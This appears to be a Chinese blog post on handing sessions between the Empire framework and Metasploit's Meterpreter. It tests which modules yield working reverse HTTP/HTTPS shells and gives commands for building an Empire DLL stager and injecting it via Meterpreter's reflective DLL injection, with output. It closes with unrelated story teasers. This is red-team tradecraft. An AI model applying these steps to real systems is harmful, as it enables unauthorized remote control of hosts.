关于Empire和Matesploit联动的一些事

Empire to Meterpreter

最近重温了下empire框架,发现之前通过invoke_shellcode模块来执行meterpreter/reverse_https的方法在新版empire v2.5里面行不通,做了不少测试后得到以下几个结论:

  1. 单独执行msfvemon生成的exe文件,如果能反弹,那么就是empire的问题。
  2. windows 2008 r2下无法使用https隧道反弹[1],而windows 10没有这个问题。
  3. empire的https监听器好像是有问题的,已有人提出issue
  4. invode_shellcode模块只支持stagedmeterpreter/reverse_http[s],不支持meterpreter_reverse_http[s]

测试结果如下表(agentwindows 2008 r2为例)

empire模块 msf exploit msf payload 结果
invoke_metasploitpayload web_delivery windows/x64/meterpreter/reverse_https
invoke_metasploitpayload web_delivery windows/x64/meterpreter/reverse_http
invoke_metasploitpayload web_delivery windows/meterpreter/reverse_https
invoke_metasploitpayload web_delivery windows/meterpreter/reverse_http 正常
invoke_shellcode handler windows/x64/meterpreter/reverse_https
invoke_shellcode handler windows/x64/meterpreter/reverse_http 功能缺失
invoke_shellcode handler windows/meterpreter/reverse_https
invoke_shellcode handler windows/meterpreter/reverse_http 功能缺失
invoke_reflectivepeinjection msfvemon windows/x64/meterpreter/reverse_https
invoke_reflectivepeinjection msfvemon windows/x64/meterpreter/reverse_http
invoke_reflectivepeinjection msfvemon windows/meterpreter/reverse_https
invoke_reflectivepeinjection msfvemon windows/meterpreter/reverse_http

这里的功能缺失指的是,meterpreter反弹回来之后,能够执行的命令只有core comanand
因为阶段性加载dll的关系,后面的dll不知什么原因没有加载到。
通过load指令显示No response was received to the core_enumextcmd request.,也是加载失败。

一些TIPs

  • handler设置的payloadwindows/meterpreter/reverse_http时,可以同时处理stagedstageless两类的反弹。
  • web_deliverypayload通过设置url路径来重用端口;handle设置ExitOnSession false,可以让多个会话复用同个端口。
  • empire中的host,用起来更像是完整的url而不是ip。
  • web_delivery,单独使用也是个不错的选择。

Meterpreter to Empire

empire生成一个dll文件

(Empire: listeners) > usestager windows/dll
(Empire: stager/windows/dll) > set Listener http
(Empire: stager/windows/dll) > execute

meterpreter使用dll注入,设置好会话id和系统权限的进程id后执行。

msf post(windows/manage/reflective_dll_inject) > exploit 

[*] Running module against WEB
[*] Injecting /tmp/launcher.dll into 2400 ...
[*] DLL injected. Executing ReflectiveLoader ...
[+] DLL injected and invoked.
[*] Post module execution completed

TODO : Cobalt strike

[1] https://github.com/rapid7/metasploit-framework/wiki/The-ins-and-outs-of-HTTP-and-HTTPS-communications-in-Meterpreter-and-Metasploit-Stagers

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,591评论 6 501
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,448评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,823评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,204评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,228评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,190评论 1 299
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,078评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,923评论 0 274
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,334评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,550评论 2 333
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,727评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,428评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,022评论 3 326
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,672评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,826评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,734评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,619评论 2 354

推荐阅读更多精彩内容